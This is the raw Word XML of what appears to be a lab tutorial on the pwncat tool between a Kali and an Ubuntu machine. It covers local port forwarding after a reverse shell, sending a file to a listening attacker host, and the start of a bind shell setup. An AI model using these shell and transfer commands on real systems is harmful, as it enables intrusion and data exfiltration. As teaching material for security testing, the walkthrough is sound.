    <w:p w14:paraId="2260E54E" w14:textId="53E95943"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4BB972B5" wp14:editId="764F1BC5">
            <wp:extent cx="5731510" cy="274701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747010"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A49B939" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Local Port Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7953C261" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Perform the installation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside the Ubuntu machine using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D54FB0D" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="602FE648" w14:textId="211959FD"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24726BFD" wp14:editId="52910929">
            <wp:extent cx="5731510" cy="268160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681605"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A239B7" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>After a reverse shell is obtained using the usage discussed in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>As a Listener </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>section. It was observed that an application is running internally inside the Ubuntu machine at port 8080. Hence to access that web application inside our kali machine, we will perform Local Port forwarding using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CE7FC" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>127.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACABD4" w14:textId="43F52605"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54A58168" wp14:editId="1F52BBA3">
            <wp:extent cx="5731510" cy="654558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6545580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5548B277" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">After the execution of the above command, the web application can now be accessed inside the kali machine at the URL: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>http://192.168.1.23:5000</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60F35FE3" w14:textId="3B6C19D7"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C624AF8" wp14:editId="74249B70">
            <wp:extent cx="5731510" cy="206311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063115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B26D70" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Send and Receive Files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1D6A0F" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Besides the above discussed usage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> can also be used to send/receive files. It starts with the installation of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the ubuntu machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467A8B67" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>This includes creating a file in the Ubuntu system as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>data.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> file in the ubuntu machine and start a listener in the kali machine where the file is to be received.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6642D2F8" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To receive the file in the kali machine, the following command can be used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA46B28" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-g1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFA90F" w14:textId="054BAC54"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11E30448" wp14:editId="5FF99811">
            <wp:extent cx="5067300" cy="6248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67300" cy="624840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF581E2" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>After the listener is active the following command can be used to transfer the file in kali machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0884A85A" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>6666</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-g1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643B31E0" w14:textId="13C417BC"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b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D27FF1E" wp14:editId="11D1F4CE">
            <wp:extent cx="5731510" cy="3644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64490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF54C85" w14:textId="562ED60C"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noProof/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12730E3F" wp14:editId="41F45A09">
            <wp:extent cx="5731510" cy="102806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028065"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5685649B" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="75"/>
        <w:rPr>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:color w:val="000000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Josefin Sans" w:hAnsi="Josefin Sans"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="800000"/>
          <w:sz w:val="35"/>
          <w:szCs w:val="35"/>
        </w:rPr>
        <w:t>Bind Shell (Linux)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5671636D" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>To get a bind shell start a listener inside the kali machine using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5700339F" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pwncat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n0"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>192.168</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-n1"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="009999"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>9874</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC95199" w14:textId="77777777"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color w:val="000000"/>
        </w:rPr>
        <w:t>Inside the Ubuntu machine type the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C3791" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="324" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Code Pro" w:hAnsi="Source Code Pro"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
